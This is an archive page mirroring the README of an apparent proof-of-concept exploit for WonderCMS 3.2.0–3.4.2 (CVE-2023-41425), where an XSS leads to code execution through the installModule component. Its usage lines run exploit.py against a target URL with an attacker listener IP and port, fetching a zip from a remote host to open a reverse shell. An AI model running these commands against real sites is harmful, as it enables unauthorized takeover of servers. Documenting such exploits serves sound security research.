Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-41425 PoC — WonderCMS 安全漏洞

Source
Associated Vulnerability
Title:WonderCMS 安全漏洞 (CVE-2023-41425)
Description:WonderCMS是一套基于PHP的开源内容管理系统(CMS)。 WonderCMS v.3.2.0版本至v.3.4.2版本存在安全漏洞。攻击者利用该漏洞通过上传到installModule组件的特制脚本执行任意代码。
Description
WonderCMS RCE CVE-2023-41425
Readme

# RCE for  WonderCMS versions v3.2.0 to v3.4.2


WonderCMS versions v3.2.0 to v3.4.2 with XSS vulnerability allow a malicious actor to achieve RCE by uploading a component to the installModule CVE-2023-41425 (No need to know the password).


## Features:

- Automated exploitation of CVE-2023-41425
- Ease of specifying the remote host where the zip is downloaded from



## Usage/Examples
Specifying the remote host from where the main.zip file is downloaded
```
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321 -r http://10.10.14.110:8000/main.zip
```

OR
not specifying the main.zip file. By default, it downloads from [main.zip](https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip)

```
./exploit.py -u http://example.com/loginURL -i 10.10.14.110 -p 4321
```

## Screenshots

![Useage](./img/1.png)
![Useage](./img/2.png)


## 🔗 Links

[![my website](https://img.shields.io/badge/website-000000?style=for-the-badge&logo=About.me&logoColor=black&labelColor=gold)](https://insomnia-jacob.github.io/me/)
[![youtube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/@Insomnia-dev)
[![twitter](https://img.shields.io/badge/X-000000?style=for-the-badge&logo=x&logoColor=white)](https://x.com/intent/follow?screen_name=insomniadev_) 
[![instagram](https://img.shields.io/badge/Instagram-E4405F?style=for-the-badge&logo=instagram&logoColor=white)](https://www.instagram.com/insomnia.py/)
[![Hack the box](https://img.shields.io/badge/HackTheBox-111927?style=for-the-badge&logo=Hack%20The%20Box&logoColor=9FEF00)](https://app.hackthebox.com/users/1974102)
File Snapshot

[4.0K] /data/pocs/37d40b2a3bad923797d3139c08c20728ae778a93 ├── [3.9K] exploit.py ├── [4.0K] img │   ├── [ 69K] 1.png │   └── [ 28K] 2.png ├── [2.6K] main.zip └── [1.6K] README.md 1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.